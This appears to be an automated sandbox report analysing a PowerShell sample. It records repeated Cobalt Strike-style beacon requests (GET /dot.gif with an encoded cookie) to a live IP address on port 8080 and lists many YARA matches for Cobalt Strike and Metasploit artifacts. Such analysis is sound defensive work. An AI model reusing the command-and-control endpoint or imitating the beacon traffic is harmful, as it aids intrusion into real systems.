                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: powershell.exe, 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gif
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gif1
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gif11:8080/dot.gif
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gif2
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF99F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gif9.0
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gifD
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gifG
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF99F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gifPDL
                      Source: powershell.exe, 00000000.00000002.4121724697.0000022EF9D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gifU
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gife
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gifll
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gifllV
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gifystem32
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.78.244.11:8080/dot.gif~
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE2E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE2508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 3.ps1, type: SAMPLEMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
                      Source: amsi64_1900.amsi.csv, type: OTHERMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTRMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C0F34 CreateProcessAsUserA,GetLastError,GetLastError,CreateProcessA,GetLastError,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithTokenW,GetLastError,GetLastError,GetLastError,GetLastError,0_2_0000022EFA0C0F34
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B3E6000_2_0000022EF9B3E600
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B1CE3C0_2_0000022EF9B1CE3C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B2F5A80_2_0000022EF9B2F5A8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B3CFF00_2_0000022EF9B3CFF0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B3B7B00_2_0000022EF9B3B7B0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B26F380_2_0000022EF9B26F38
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B196800_2_0000022EF9B19680
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B3C6800_2_0000022EF9B3C680
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B312640_2_0000022EF9B31264
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B319280_2_0000022EF9B31928
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B359140_2_0000022EF9B35914
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B1916C0_2_0000022EF9B1916C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B3239C0_2_0000022EF9B3239C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B3C3970_2_0000022EF9B3C397
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B303740_2_0000022EF9B30374
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B203340_2_0000022EF9B20334
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B3AAB00_2_0000022EF9B3AAB0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C867C0_2_0000022EFA0C867C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0DB6B00_2_0000022EFA0DB6B0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C0F340_2_0000022EFA0C0F34
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D0F740_2_0000022EFA0D0F74
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D2F9C0_2_0000022EFA0D2F9C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0DCF970_2_0000022EFA0DCF97
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D65140_2_0000022EFA0D6514
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D25280_2_0000022EFA0D2528
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0B9D6C0_2_0000022EFA0B9D6C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D1E640_2_0000022EFA0D1E64
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0BA2800_2_0000022EFA0BA280
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0DD2800_2_0000022EFA0DD280
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C7B380_2_0000022EFA0C7B38
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0DC3B00_2_0000022EFA0DC3B0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0DDBF00_2_0000022EFA0DDBF0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D01A80_2_0000022EFA0D01A8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0DF2000_2_0000022EFA0DF200
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0BDA3C0_2_0000022EFA0BDA3C
                      Source: 3.ps1, type: SAMPLEMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: amsi64_1900.amsi.csv, type: OTHERMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
